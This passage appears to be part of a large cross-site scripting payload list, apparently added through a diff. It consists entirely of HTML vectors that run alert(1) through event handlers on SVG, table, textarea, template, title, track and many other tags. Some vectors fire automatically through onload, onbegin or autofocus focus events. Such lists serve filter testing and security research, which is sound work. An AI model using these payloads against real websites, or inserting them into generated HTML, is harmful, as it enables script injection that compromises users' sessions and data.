onmouseenter="alert(1)">test</sup> +<sup onmouseleave="alert(1)">test</sup> +<sup onmousemove="alert(1)">test</sup> +<sup onmouseout="alert(1)">test</sup> +<sup onmouseover="alert(1)">test</sup> +<sup onmouseup="alert(1)">test</sup> +<sup onpaste="alert(1)" contenteditable>test</sup> +<svg draggable="true" ondrag="alert(1)">test</svg> +<svg draggable="true" ondragend="alert(1)">test</svg> +<svg draggable="true" ondragenter="alert(1)">test</svg> +<svg draggable="true" ondragleave="alert(1)">test</svg> +<svg draggable="true" ondragstart="alert(1)">test</svg> +<svg id=x onfocus=alert(1)> +<svg id=x onfocusin=alert(1)> +<svg id=x tabindex=1 onactivate=alert(1)></svg> +<svg id=x tabindex=1 onbeforeactivate=alert(1)></svg> +<svg id=x tabindex=1 onbeforedeactivate=alert(1)></svg><input autofocus> +<svg id=x tabindex=1 ondeactivate=alert(1)></svg><input id=y autofocus> +<svg onbeforecopy="alert(1)" contenteditable>test</svg> +<svg onbeforecut="alert(1)" contenteditable>test</svg> +<svg onbeforepaste="alert(1)" contenteditable>test</svg> +<svg onblur=alert(1) tabindex=1 id=x></svg><input autofocus> +<svg onclick="alert(1)">test</svg> +<svg oncontextmenu="alert(1)">test</svg> +<svg oncopy="alert(1)" contenteditable>test</svg> +<svg oncut="alert(1)" contenteditable>test</svg> +<svg ondblclick="alert(1)">test</svg> +<svg onfocusout=alert(1) tabindex=1 id=x></svg><input autofocus> +<svg onkeydown="alert(1)" contenteditable>test</svg> +<svg onkeypress="alert(1)" contenteditable>test</svg> +<svg onkeyup="alert(1)" contenteditable>test</svg> +<svg onload=alert(1)> +<svg onmousedown="alert(1)">test</svg> +<svg onmouseenter="alert(1)">test</svg> +<svg onmouseleave="alert(1)">test</svg> +<svg onmousemove="alert(1)">test</svg> +<svg onmouseout="alert(1)">test</svg> +<svg onmouseover="alert(1)">test</svg> +<svg onmouseup="alert(1)">test</svg> +<svg onpaste="alert(1)" contenteditable>test</svg> +<svg onunload=window.open('javascript:alert(1)')> +<svg><a onload=alert(1)></a> +<svg><abbr onload=alert(1)></abbr> +<svg><acronym onload=alert(1)></acronym> +<svg><address onload=alert(1)></address> +<svg><animate onbegin=alert(1) attributeName=x dur=1s> +<svg><animate onend=alert(1) attributeName=x dur=1s> +<svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 /> +<svg><animatetransform onbegin=alert(1) attributeName=transform> +<svg><animatetransform onend=alert(1) attributeName=transform dur=1s> +<svg><animatetransform onrepeat=alert(1) attributeName=transform repeatCount=2 dur=1s> +<svg><applet onload=alert(1)></applet> +<svg><area onload=alert(1)></area> +<svg><article onload=alert(1)></article> +<svg><aside onload=alert(1)></aside> +<svg><audio onload=alert(1)></audio> +<svg><b onload=alert(1)></b> +<svg><base onload=alert(1)></base> +<svg><basefont onload=alert(1)></basefont> +<svg><bdi onload=alert(1)></bdi> +<svg><bdo onload=alert(1)></bdo> +<svg><bgsound onload=alert(1)></bgsound> +<svg><big onload=alert(1)></big> +<svg><blink onload=alert(1)></blink> +<svg><blockquote onload=alert(1)></blockquote> +<svg><br onload=alert(1)></br> +<svg><button onload=alert(1)></button> +<svg><canvas onload=alert(1)></canvas> +<svg><caption onload=alert(1)></caption> +<svg><center onload=alert(1)></center> +<svg><cite onload=alert(1)></cite> +<svg><code onload=alert(1)></code> +<svg><col onload=alert(1)></col> +<svg><colgroup onload=alert(1)></colgroup> +<svg><command onload=alert(1)></command> +<svg><content onload=alert(1)></content> +<svg><data onload=alert(1)></data> +<svg><datalist onload=alert(1)></datalist> +<svg><dd onload=alert(1)></dd> +<svg><del onload=alert(1)></del> +<svg><details onload=alert(1)></details> +<svg><dfn onload=alert(1)></dfn> +<svg><dialog onload=alert(1)></dialog> +<svg><dir onload=alert(1)></dir> +<svg><discard onbegin=alert(1)> +<svg><div onload=alert(1)></div> +<svg><dl onload=alert(1)></dl> +<svg><dt onload=alert(1)></dt> +<svg><element onload=alert(1)></element> +<svg><em onload=alert(1)></em> +<svg><fieldset onload=alert(1)></fieldset> +<svg><figcaption onload=alert(1)></figcaption> +<svg><figure onload=alert(1)></figure> +<svg><font onload=alert(1)></font> +<svg><footer onload=alert(1)></footer> +<svg><form onload=alert(1)></form> +<svg><frameset onload=alert(1)></frameset> +<svg><h1 onload=alert(1)></h1> +<svg><head onload=alert(1)></head> +<svg><header onload=alert(1)></header> +<svg><hgroup onload=alert(1)></hgroup> +<svg><hr onload=alert(1)></hr> +<svg><html onload=alert(1)></html> +<svg><i onload=alert(1)></i> +<svg><image href=1 onerror=alert(1)> +<svg><image href=validimage.png onload=alert(1)> +<svg><ins onload=alert(1)></ins> +<svg><kbd onload=alert(1)></kbd> +<svg><keygen onload=alert(1)></keygen> +<svg><label onload=alert(1)></label> +<svg><legend onload=alert(1)></legend> +<svg><li onload=alert(1)></li> +<svg><listing onload=alert(1)></listing> +<svg><main onload=alert(1)></main> +<svg><map onload=alert(1)></map> +<svg><mark onload=alert(1)></mark> +<svg><marquee onload=alert(1)></marquee> +<svg><menu onload=alert(1)></menu> +<svg><menuitem onload=alert(1)></menuitem> +<svg><meta onload=alert(1)></meta> +<svg><meter onload=alert(1)></meter> +<svg><multicol onload=alert(1)></multicol> +<svg><nav onload=alert(1)></nav> +<svg><nextid onload=alert(1)></nextid> +<svg><nobr onload=alert(1)></nobr> +<svg><noembed onload=alert(1)></noembed> +<svg><noframes onload=alert(1)></noframes> +<svg><noscript onload=alert(1)></noscript> +<svg><ol onload=alert(1)></ol> +<svg><optgroup onload=alert(1)></optgroup> +<svg><option onload=alert(1)></option> +<svg><output onload=alert(1)></output> +<svg><p onload=alert(1)></p> +<svg><param onload=alert(1)></param> +<svg><path><animateMotion onbegin=alert(1) dur="1s" repeatCount="1"> +<svg><path><animateMotion onend=alert(1) dur=1s repeatCount=1> +<svg><path><animateMotion onrepeat=alert(1) dur="1s" repeatCount="2"> +<svg><picture onload=alert(1)></picture> +<svg><plaintext onload=alert(1)></plaintext> +<svg><pre onload=alert(1)></pre> +<svg><progress onload=alert(1)></progress> +<svg><q onload=alert(1)></q> +<svg><rb onload=alert(1)></rb> +<svg><rp onload=alert(1)></rp> +<svg><rt onload=alert(1)></rt> +<svg><rtc onload=alert(1)></rtc> +<svg><ruby onload=alert(1)></ruby> +<svg><s onload=alert(1)></s> +<svg><samp onload=alert(1)></samp> +<svg><section onload=alert(1)></section> +<svg><select onload=alert(1)></select> +<svg><set onbegin=alert(1) attributename=x dur=1s> +<svg><set onend=alert(1) attributename=x dur=1s> +<svg><set onrepeat=alert(1) attributename=x dur=1s repeatcount=2> +<svg><shadow onload=alert(1)></shadow> +<svg><slot onload=alert(1)></slot> +<svg><small onload=alert(1)></small> +<svg><source onload=alert(1)></source> +<svg><spacer onload=alert(1)></spacer> +<svg><span onload=alert(1)></span> +<svg><strike onload=alert(1)></strike> +<svg><strong onload=alert(1)></strong> +<svg><sub onload=alert(1)></sub> +<svg><summary onload=alert(1)></summary> +<svg><sup onload=alert(1)></sup> +<svg><table onload=alert(1)></table> +<svg><tbody onload=alert(1)></tbody> +<svg><td onload=alert(1)></td> +<svg><template onload=alert(1)></template> +<svg><textarea onload=alert(1)></textarea> +<svg><tfoot onload=alert(1)></tfoot> +<svg><th onload=alert(1)></th> +<svg><thead onload=alert(1)></thead> +<svg><time onload=alert(1)></time> +<svg><title onload=alert(1)></title> +<svg><tr onload=alert(1)></tr> +<svg><tt onload=alert(1)></tt> +<svg><u onload=alert(1)></u> +<svg><ul onload=alert(1)></ul> +<svg><var onload=alert(1)></var> +<svg><video onload=alert(1)></video> +<svg><wbr onload=alert(1)></wbr> +<svg><xmp onload=alert(1)></xmp> +<svg><xss onload=alert(1)></xss> +<table draggable="true" ondrag="alert(1)">test</table> +<table draggable="true" ondragend="alert(1)">test</table> +<table draggable="true" ondragenter="alert(1)">test</table> +<table draggable="true" ondragleave="alert(1)">test</table> +<table draggable="true" ondragstart="alert(1)">test</table> +<table id=x tabindex=1 onactivate=alert(1)></table> +<table id=x tabindex=1 onbeforeactivate=alert(1)></table> +<table id=x tabindex=1 onbeforedeactivate=alert(1)></table><input autofocus> +<table id=x tabindex=1 ondeactivate=alert(1)></table><input id=y autofocus> +<table id=x tabindex=1 onfocus=alert(1)></table> +<table id=x tabindex=1 onfocusin=alert(1)></table> +<table onbeforecopy="alert(1)" contenteditable>test</table> +<table onbeforecut="alert(1)" contenteditable>test</table> +<table onbeforepaste="alert(1)" contenteditable>test</table> +<table onblur=alert(1) tabindex=1 id=x></table><input autofocus> +<table onclick="alert(1)">test</table> +<table oncontextmenu="alert(1)">test</table> +<table oncopy="alert(1)" contenteditable>test</table> +<table oncut="alert(1)" contenteditable>test</table> +<table ondblclick="alert(1)">test</table> +<table onfocusout=alert(1) tabindex=1 id=x></table><input autofocus> +<table onkeydown="alert(1)" contenteditable>test</table> +<table onkeypress="alert(1)" contenteditable>test</table> +<table onkeyup="alert(1)" contenteditable>test</table> +<table onmousedown="alert(1)">test</table> +<table onmouseenter="alert(1)">test</table> +<table onmouseleave="alert(1)">test</table> +<table onmousemove="alert(1)">test</table> +<table onmouseout="alert(1)">test</table> +<table onmouseover="alert(1)">test</table> +<table onmouseup="alert(1)">test</table> +<table onpaste="alert(1)" contenteditable>test</table> +<tbody draggable="true" ondrag="alert(1)">test</tbody> +<tbody draggable="true" ondragend="alert(1)">test</tbody> +<tbody draggable="true" ondragenter="alert(1)">test</tbody> +<tbody draggable="true" ondragleave="alert(1)">test</tbody> +<tbody draggable="true" ondragstart="alert(1)">test</tbody> +<tbody id=x tabindex=1 onactivate=alert(1)></tbody> +<tbody id=x tabindex=1 onbeforeactivate=alert(1)></tbody> +<tbody id=x tabindex=1 onbeforedeactivate=alert(1)></tbody><input autofocus> +<tbody id=x tabindex=1 ondeactivate=alert(1)></tbody><input id=y autofocus> +<tbody id=x tabindex=1 onfocus=alert(1)></tbody> +<tbody id=x tabindex=1 onfocusin=alert(1)></tbody> +<tbody onbeforecopy="alert(1)" contenteditable>test</tbody> +<tbody onbeforecut="alert(1)" contenteditable>test</tbody> +<tbody onbeforepaste="alert(1)" contenteditable>test</tbody> +<tbody onblur=alert(1) tabindex=1 id=x></tbody><input autofocus> +<tbody onclick="alert(1)">test</tbody> +<tbody oncontextmenu="alert(1)">test</tbody> +<tbody oncopy="alert(1)" contenteditable>test</tbody> +<tbody oncut="alert(1)" contenteditable>test</tbody> +<tbody ondblclick="alert(1)">test</tbody> +<tbody onfocusout=alert(1) tabindex=1 id=x></tbody><input autofocus> +<tbody onkeydown="alert(1)" contenteditable>test</tbody> +<tbody onkeypress="alert(1)" contenteditable>test</tbody> +<tbody onkeyup="alert(1)" contenteditable>test</tbody> +<tbody onmousedown="alert(1)">test</tbody> +<tbody onmouseenter="alert(1)">test</tbody> +<tbody onmouseleave="alert(1)">test</tbody> +<tbody onmousemove="alert(1)">test</tbody> +<tbody onmouseout="alert(1)">test</tbody> +<tbody onmouseover="alert(1)">test</tbody> +<tbody onmouseup="alert(1)">test</tbody> +<tbody onpaste="alert(1)" contenteditable>test</tbody> +<td draggable="true" ondrag="alert(1)">test</td> +<td draggable="true" ondragend="alert(1)">test</td> +<td draggable="true" ondragenter="alert(1)">test</td> +<td draggable="true" ondragleave="alert(1)">test</td> +<td draggable="true" ondragstart="alert(1)">test</td> +<td id=x tabindex=1 onactivate=alert(1)></td> +<td id=x tabindex=1 onbeforeactivate=alert(1)></td> +<td id=x tabindex=1 onbeforedeactivate=alert(1)></td><input autofocus> +<td id=x tabindex=1 ondeactivate=alert(1)></td><input id=y autofocus> +<td id=x tabindex=1 onfocus=alert(1)></td> +<td id=x tabindex=1 onfocusin=alert(1)></td> +<td onbeforecopy="alert(1)" contenteditable>test</td> +<td onbeforecut="alert(1)" contenteditable>test</td> +<td onbeforepaste="alert(1)" contenteditable>test</td> +<td onblur=alert(1) tabindex=1 id=x></td><input autofocus> +<td onclick="alert(1)">test</td> +<td oncontextmenu="alert(1)">test</td> +<td oncopy="alert(1)" contenteditable>test</td> +<td oncut="alert(1)" contenteditable>test</td> +<td ondblclick="alert(1)">test</td> +<td onfocusout=alert(1) tabindex=1 id=x></td><input autofocus> +<td onkeydown="alert(1)" contenteditable>test</td> +<td onkeypress="alert(1)" contenteditable>test</td> +<td onkeyup="alert(1)" contenteditable>test</td> +<td onmousedown="alert(1)">test</td> +<td onmouseenter="alert(1)">test</td> +<td onmouseleave="alert(1)">test</td> +<td onmousemove="alert(1)">test</td> +<td onmouseout="alert(1)">test</td> +<td onmouseover="alert(1)">test</td> +<td onmouseup="alert(1)">test</td> +<td onpaste="alert(1)" contenteditable>test</td> +<template draggable="true" ondrag="alert(1)">test</template> +<template draggable="true" ondragend="alert(1)">test</template> +<template draggable="true" ondragenter="alert(1)">test</template> +<template draggable="true" ondragleave="alert(1)">test</template> +<template draggable="true" ondragstart="alert(1)">test</template> +<template id=x tabindex=1 onactivate=alert(1)></template> +<template id=x tabindex=1 onbeforeactivate=alert(1)></template> +<template id=x tabindex=1 onbeforedeactivate=alert(1)></template><input autofocus> +<template id=x tabindex=1 ondeactivate=alert(1)></template><input id=y autofocus> +<template id=x tabindex=1 onfocus=alert(1)></template> +<template id=x tabindex=1 onfocusin=alert(1)></template> +<template onbeforecopy="alert(1)" contenteditable>test</template> +<template onbeforecut="alert(1)" contenteditable>test</template> +<template onbeforepaste="alert(1)" contenteditable>test</template> +<template onblur=alert(1) tabindex=1 id=x></template><input autofocus> +<template onclick="alert(1)">test</template> +<template oncontextmenu="alert(1)">test</template> +<template oncopy="alert(1)" contenteditable>test</template> +<template oncut="alert(1)" contenteditable>test</template> +<template ondblclick="alert(1)">test</template> +<template onfocusout=alert(1) tabindex=1 id=x></template><input autofocus> +<template onkeydown="alert(1)" contenteditable>test</template> +<template onkeypress="alert(1)" contenteditable>test</template> +<template onkeyup="alert(1)" contenteditable>test</template> +<template onmousedown="alert(1)">test</template> +<template onmouseenter="alert(1)">test</template> +<template onmouseleave="alert(1)">test</template> +<template onmousemove="alert(1)">test</template> +<template onmouseout="alert(1)">test</template> +<template onmouseover="alert(1)">test</template> +<template onmouseup="alert(1)">test</template> +<template onpaste="alert(1)" contenteditable>test</template> +<textarea autofocus onfocus=alert(1)>test</textarea> +<textarea autofocus onfocusin=alert(1)>test</textarea> +<textarea draggable="true" ondrag="alert(1)">test</textarea> +<textarea draggable="true" ondragend="alert(1)">test</textarea> +<textarea draggable="true" ondragenter="alert(1)">test</textarea> +<textarea draggable="true" ondragleave="alert(1)">test</textarea> +<textarea draggable="true" ondragstart="alert(1)">test</textarea> +<textarea id=x tabindex=1 onactivate=alert(1)></textarea> +<textarea id=x tabindex=1 onbeforeactivate=alert(1)></textarea> +<textarea id=x tabindex=1 onbeforedeactivate=alert(1)></textarea><input autofocus> +<textarea id=x tabindex=1 ondeactivate=alert(1)></textarea><input id=y autofocus> +<textarea onauxclick=alert(1)>XSS</textarea> +<textarea onbeforecopy=alert(1) autofocus>XSS</textarea> +<textarea onbeforecut=alert(1) autofocus>XSS</textarea> +<textarea onbeforepaste=alert(1) autofocus></textarea> +<textarea onblur=alert(1) id=x></textarea><input autofocus> +<textarea onchange=alert(1)>XSS</textarea> +<textarea onclick="alert(1)">test</textarea> +<textarea oncontextmenu="alert(1)">test</textarea> +<textarea oncopy=alert(1) autofocus>XSS</textarea> +<textarea oncut=alert(1) autofocus>XSS</textarea> +<textarea ondblclick="alert(1)">test</textarea> +<textarea onfocusout=alert(1) id=x></textarea><input autofocus> +<textarea oninput=alert(1)>XSS</textarea> +<textarea onkeydown="alert(1)" contenteditable>test</textarea> +<textarea onkeypress="alert(1)" contenteditable>test</textarea> +<textarea onkeyup="alert(1)" contenteditable>test</textarea> +<textarea onmousedown="alert(1)">test</textarea> +<textarea onmouseenter="alert(1)">test</textarea> +<textarea onmouseleave="alert(1)">test</textarea> +<textarea onmousemove="alert(1)">test</textarea> +<textarea onmouseout="alert(1)">test</textarea> +<textarea onmouseover="alert(1)">test</textarea> +<textarea onmouseup="alert(1)">test</textarea> +<textarea onpaste=alert(1) autofocus></textarea> +<textarea onselect=alert(1) autofocus>XSS</textarea> +<tfoot draggable="true" ondrag="alert(1)">test</tfoot> +<tfoot draggable="true" ondragend="alert(1)">test</tfoot> +<tfoot draggable="true" ondragenter="alert(1)">test</tfoot> +<tfoot draggable="true" ondragleave="alert(1)">test</tfoot> +<tfoot draggable="true" ondragstart="alert(1)">test</tfoot> +<tfoot id=x tabindex=1 onactivate=alert(1)></tfoot> +<tfoot id=x tabindex=1 onbeforeactivate=alert(1)></tfoot> +<tfoot id=x tabindex=1 onbeforedeactivate=alert(1)></tfoot><input autofocus> +<tfoot id=x tabindex=1 ondeactivate=alert(1)></tfoot><input id=y autofocus> +<tfoot id=x tabindex=1 onfocus=alert(1)></tfoot> +<tfoot id=x tabindex=1 onfocusin=alert(1)></tfoot> +<tfoot onbeforecopy="alert(1)" contenteditable>test</tfoot> +<tfoot onbeforecut="alert(1)" contenteditable>test</tfoot> +<tfoot onbeforepaste="alert(1)" contenteditable>test</tfoot> +<tfoot onblur=alert(1) tabindex=1 id=x></tfoot><input autofocus> +<tfoot onclick="alert(1)">test</tfoot> +<tfoot oncontextmenu="alert(1)">test</tfoot> +<tfoot oncopy="alert(1)" contenteditable>test</tfoot> +<tfoot oncut="alert(1)" contenteditable>test</tfoot> +<tfoot ondblclick="alert(1)">test</tfoot> +<tfoot onfocusout=alert(1) tabindex=1 id=x></tfoot><input autofocus> +<tfoot onkeydown="alert(1)" contenteditable>test</tfoot> +<tfoot onkeypress="alert(1)" contenteditable>test</tfoot> +<tfoot onkeyup="alert(1)" contenteditable>test</tfoot> +<tfoot onmousedown="alert(1)">test</tfoot> +<tfoot onmouseenter="alert(1)">test</tfoot> +<tfoot onmouseleave="alert(1)">test</tfoot> +<tfoot onmousemove="alert(1)">test</tfoot> +<tfoot onmouseout="alert(1)">test</tfoot> +<tfoot onmouseover="alert(1)">test</tfoot> +<tfoot onmouseup="alert(1)">test</tfoot> +<tfoot onpaste="alert(1)" contenteditable>test</tfoot> +<th draggable="true" ondrag="alert(1)">test</th> +<th draggable="true" ondragend="alert(1)">test</th> +<th draggable="true" ondragenter="alert(1)">test</th> +<th draggable="true" ondragleave="alert(1)">test</th> +<th draggable="true" ondragstart="alert(1)">test</th> +<th id=x tabindex=1 onactivate=alert(1)></th> +<th id=x tabindex=1 onbeforeactivate=alert(1)></th> +<th id=x tabindex=1 onbeforedeactivate=alert(1)></th><input autofocus> +<th id=x tabindex=1 ondeactivate=alert(1)></th><input id=y autofocus> +<th id=x tabindex=1 onfocus=alert(1)></th> +<th id=x tabindex=1 onfocusin=alert(1)></th> +<th onbeforecopy="alert(1)" contenteditable>test</th> +<th onbeforecut="alert(1)" contenteditable>test</th> +<th onbeforepaste="alert(1)" contenteditable>test</th> +<th onblur=alert(1) tabindex=1 id=x></th><input autofocus> +<th onclick="alert(1)">test</th> +<th oncontextmenu="alert(1)">test</th> +<th oncopy="alert(1)" contenteditable>test</th> +<th oncut="alert(1)" contenteditable>test</th> +<th ondblclick="alert(1)">test</th> +<th onfocusout=alert(1) tabindex=1 id=x></th><input autofocus> +<th onkeydown="alert(1)" contenteditable>test</th> +<th onkeypress="alert(1)" contenteditable>test</th> +<th onkeyup="alert(1)" contenteditable>test</th> +<th onmousedown="alert(1)">test</th> +<th onmouseenter="alert(1)">test</th> +<th onmouseleave="alert(1)">test</th> +<th onmousemove="alert(1)">test</th> +<th onmouseout="alert(1)">test</th> +<th onmouseover="alert(1)">test</th> +<th onmouseup="alert(1)">test</th> +<th onpaste="alert(1)" contenteditable>test</th> +<thead draggable="true" ondrag="alert(1)">test</thead> +<thead draggable="true" ondragend="alert(1)">test</thead> +<thead draggable="true" ondragenter="alert(1)">test</thead> +<thead draggable="true" ondragleave="alert(1)">test</thead> +<thead draggable="true" ondragstart="alert(1)">test</thead> +<thead id=x tabindex=1 onactivate=alert(1)></thead> +<thead id=x tabindex=1 onbeforeactivate=alert(1)></thead> +<thead id=x tabindex=1 onbeforedeactivate=alert(1)></thead><input autofocus> +<thead id=x tabindex=1 ondeactivate=alert(1)></thead><input id=y autofocus> +<thead id=x tabindex=1 onfocus=alert(1)></thead> +<thead id=x tabindex=1 onfocusin=alert(1)></thead> +<thead onbeforecopy="alert(1)" contenteditable>test</thead> +<thead onbeforecut="alert(1)" contenteditable>test</thead> +<thead onbeforepaste="alert(1)" contenteditable>test</thead> +<thead onblur=alert(1) tabindex=1 id=x></thead><input autofocus> +<thead onclick="alert(1)">test</thead> +<thead oncontextmenu="alert(1)">test</thead> +<thead oncopy="alert(1)" contenteditable>test</thead> +<thead oncut="alert(1)" contenteditable>test</thead> +<thead ondblclick="alert(1)">test</thead> +<thead onfocusout=alert(1) tabindex=1 id=x></thead><input autofocus> +<thead onkeydown="alert(1)" contenteditable>test</thead> +<thead onkeypress="alert(1)" contenteditable>test</thead> +<thead onkeyup="alert(1)" contenteditable>test</thead> +<thead onmousedown="alert(1)">test</thead> +<thead onmouseenter="alert(1)">test</thead> +<thead onmouseleave="alert(1)">test</thead> +<thead onmousemove="alert(1)">test</thead> +<thead onmouseout="alert(1)">test</thead> +<thead onmouseover="alert(1)">test</thead> +<thead onmouseup="alert(1)">test</thead> +<thead onpaste="alert(1)" contenteditable>test</thead> +<time draggable="true" ondrag="alert(1)">test</time> +<time draggable="true" ondragend="alert(1)">test</time> +<time draggable="true" ondragenter="alert(1)">test</time> +<time draggable="true" ondragleave="alert(1)">test</time> +<time draggable="true" ondragstart="alert(1)">test</time> +<time id=x tabindex=1 onactivate=alert(1)></time> +<time id=x tabindex=1 onbeforeactivate=alert(1)></time> +<time id=x tabindex=1 onbeforedeactivate=alert(1)></time><input autofocus> +<time id=x tabindex=1 ondeactivate=alert(1)></time><input id=y autofocus> +<time id=x tabindex=1 onfocus=alert(1)></time> +<time id=x tabindex=1 onfocusin=alert(1)></time> +<time onbeforecopy="alert(1)" contenteditable>test</time> +<time onbeforecut="alert(1)" contenteditable>test</time> +<time onbeforepaste="alert(1)" contenteditable>test</time> +<time onblur=alert(1) tabindex=1 id=x></time><input autofocus> +<time onclick="alert(1)">test</time> +<time oncontextmenu="alert(1)">test</time> +<time oncopy="alert(1)" contenteditable>test</time> +<time oncut="alert(1)" contenteditable>test</time> +<time ondblclick="alert(1)">test</time> +<time onfocusout=alert(1) tabindex=1 id=x></time><input autofocus> +<time onkeydown="alert(1)" contenteditable>test</time> +<time onkeypress="alert(1)" contenteditable>test</time> +<time onkeyup="alert(1)" contenteditable>test</time> +<time onmousedown="alert(1)">test</time> +<time onmouseenter="alert(1)">test</time> +<time onmouseleave="alert(1)">test</time> +<time onmousemove="alert(1)">test</time> +<time onmouseout="alert(1)">test</time> +<time onmouseover="alert(1)">test</time> +<time onmouseup="alert(1)">test</time> +<time onpaste="alert(1)" contenteditable>test</time> +<title draggable="true" ondrag="alert(1)">test</title> +<title draggable="true" ondragend="alert(1)">test</title> +<title draggable="true" ondragenter="alert(1)">test</title> +<title draggable="true" ondragleave="alert(1)">test</title> +<title draggable="true" ondragstart="alert(1)">test</title> +<title id=x tabindex=1 onactivate=alert(1)></title> +<title id=x tabindex=1 onbeforeactivate=alert(1)></title> +<title id=x tabindex=1 onbeforedeactivate=alert(1)></title><input autofocus> +<title id=x tabindex=1 ondeactivate=alert(1)></title><input id=y autofocus> +<title id=x tabindex=1 onfocus=alert(1)></title> +<title id=x tabindex=1 onfocusin=alert(1)></title> +<title onbeforecopy="alert(1)" contenteditable>test</title> +<title onbeforecut="alert(1)" contenteditable>test</title> +<title onbeforepaste="alert(1)" contenteditable>test</title> +<title onblur=alert(1) tabindex=1 id=x></title><input autofocus> +<title onclick="alert(1)">test</title> +<title oncontextmenu="alert(1)">test</title> +<title oncopy="alert(1)" contenteditable>test</title> +<title oncut="alert(1)" contenteditable>test</title> +<title ondblclick="alert(1)">test</title> +<title onfocusout=alert(1) tabindex=1 id=x></title><input autofocus> +<title onkeydown="alert(1)" contenteditable>test</title> +<title onkeypress="alert(1)" contenteditable>test</title> +<title onkeyup="alert(1)" contenteditable>test</title> +<title onmousedown="alert(1)">test</title> +<title onmouseenter="alert(1)">test</title> +<title onmouseleave="alert(1)">test</title> +<title onmousemove="alert(1)">test</title> +<title onmouseout="alert(1)">test</title> +<title onmouseover="alert(1)">test</title> +<title onmouseup="alert(1)">test</title> +<title onpaste="alert(1)" contenteditable>test</title> +<tr draggable="true" ondrag="alert(1)">test</tr> +<tr draggable="true" ondragend="alert(1)">test</tr> +<tr draggable="true" ondragenter="alert(1)">test</tr> +<tr draggable="true" ondragleave="alert(1)">test</tr> +<tr draggable="true" ondragstart="alert(1)">test</tr> +<tr id=x tabindex=1 onactivate=alert(1)></tr> +<tr id=x tabindex=1 onbeforeactivate=alert(1)></tr> +<tr id=x tabindex=1 onbeforedeactivate=alert(1)></tr><input autofocus> +<tr id=x tabindex=1 ondeactivate=alert(1)></tr><input id=y autofocus> +<tr id=x tabindex=1 onfocus=alert(1)></tr> +<tr id=x tabindex=1 onfocusin=alert(1)></tr> +<tr onbeforecopy="alert(1)" contenteditable>test</tr> +<tr onbeforecut="alert(1)" contenteditable>test</tr> +<tr onbeforepaste="alert(1)" contenteditable>test</tr> +<tr onblur=alert(1) tabindex=1 id=x></tr><input autofocus> +<tr onclick="alert(1)">test</tr> +<tr oncontextmenu="alert(1)">test</tr> +<tr oncopy="alert(1)" contenteditable>test</tr> +<tr oncut="alert(1)" contenteditable>test</tr> +<tr ondblclick="alert(1)">test</tr> +<tr onfocusout=alert(1) tabindex=1 id=x></tr><input autofocus> +<tr onkeydown="alert(1)" contenteditable>test</tr> +<tr onkeypress="alert(1)" contenteditable>test</tr> +<tr onkeyup="alert(1)" contenteditable>test</tr> +<tr onmousedown="alert(1)">test</tr> +<tr onmouseenter="alert(1)">test</tr> +<tr onmouseleave="alert(1)">test</tr> +<tr onmousemove="alert(1)">test</tr> +<tr onmouseout="alert(1)">test</tr> +<tr onmouseover="alert(1)">test</tr> +<tr onmouseup="alert(1)">test</tr> +<tr onpaste="alert(1)" contenteditable>test</tr> +<track draggable="true" ondrag="alert(1)">test</track> +<track draggable="true" ondragend="alert(1)">test</track> +<track draggable="true" ondragenter="alert(1)">test</track> +<track draggable="true" ondragleave="alert(1)">test</track> +<track draggable="true" ondragstart="alert(1)">test</track> +<track id=x tabindex=1 onactivate=alert(1)></track> +<track id=x tabindex=1 onbeforeactivate=alert(1)></track> +<track id=x tabindex=1 onbeforedeactivate=alert(1)></track><input autofocus> +<track id=x tabindex=1 ondeactivate=alert(1)></track><input id=y autofocus> +<track id=x tabindex=1 onfocus=alert(1)></track> +<track id=x tabindex=1 onfocusin=alert(1)></track> +<track onbeforecopy="alert(1)" contenteditable>test</track> +<track onbeforecut="alert(1)" contenteditable>test</track> +<track onbeforepaste="alert(1)" contenteditable>test</track> +<track onblur=alert(1) tabindex=1 id=x></track><input autofocus> +<track onclick="alert(1)">test</track> +<track oncontextmenu="alert(1)">test</track> +<track oncopy="alert(1)" contenteditable>test</track> +<track oncut="alert(1)" contenteditable>test</track> +<track ondblclick="alert(1)">test</track> +<track onfocusout=alert(1) tabindex=1 id=x></track><input autofocus> +<track onkeydown="alert(1)" contenteditable>test</track> +<track onkeypress="alert(1)" contenteditable>test</track> +<track onkeyup="alert(1)" contenteditable>test</track> +<track onmousedown="alert(1)">test</track> +<track onmouseenter="alert(1)">test</track> +<track onmouseleave="alert(1)">test</track> +<track onmousemove="alert(1)">test</track> +<track onmouseout="alert(1)">test</track> +<track onmouseover="alert(1)">test</track> +<track onmouseup="alert(1)">test</track> +<track onpaste="alert(1)" contenteditable>test</track> +<tt draggable="true" ondrag="alert(1)">test</tt> +<tt draggable="true" ondragend="alert(1)">test</tt> +<tt draggable="true" ondragenter="alert(1)">test</tt> +<tt draggable="true" ondragleave="alert(1)">test</tt> +<tt draggable="true" ondragstart="alert(1)">test</tt> +<tt id=x tabindex=1 onactivate=alert(1)></tt> +<tt id=x tabindex=1 onbeforeactivate=alert(1)></tt> +<tt id=x tabindex=1 onbeforedeactivate=alert(1)></tt><input autofocus> +<tt id=x tabindex=1 ondeactivate=alert(1)></tt><input id=y autofocus> +<tt id=x tabindex=1 onfocus=alert(1)></tt> +<tt id=x tabindex=1 onfocusin=alert(1)></tt> +<tt onbeforecopy="alert(1)" contenteditable>test</tt> +<tt onbeforecut="alert(1)" contenteditable>test</tt> +<tt onbeforepaste="alert(1)" contenteditable>test</tt> +<tt onblur=alert(1) tabindex=1 id=x></tt><input autofocus> +<tt onclick="alert(1)">test</tt> +<tt oncontextmenu="alert(1)">test</tt> +<tt oncopy="alert(1)" contenteditable>test</tt> +<tt oncut="alert(1)" contenteditable>test</tt> +<tt ondblclick="alert(1)">test</tt> +<tt onfocusout=alert(1) tabindex=1 id=x></tt><input autofocus> +<tt onkeydown="alert(1)" contenteditable>test</tt> +<tt onkeypress="alert(1)" contenteditable>test</tt> +<tt onkeyup="alert(1)" contenteditable>test</tt> +<tt onmousedown="alert(1)">test</tt> +<tt onmouseenter="alert(1)">test</tt> +<tt onmouseleave="alert(1)">test</tt> +<tt onmousemove="alert(1)">test</tt> +<tt onmouseout="alert(1)">test</tt> +<tt onmouseover="alert(1)">test</tt> +<tt onmouseup="alert(1)">test</tt> +<tt onpaste="alert(1)" contenteditable>test</tt> +<u draggable="true" ondrag="alert(1)">test</u> +<u draggable="true" ondragend="alert(1)">test</u> +<u draggable="true" ondragenter="alert(1)">test</u> +<u draggable="true" ondragleave="alert(1)">test</u> +<u draggable="true" ondragstart="alert(1)">test</u> +<u id=x tabindex=1 onactivate=alert(1)></u> 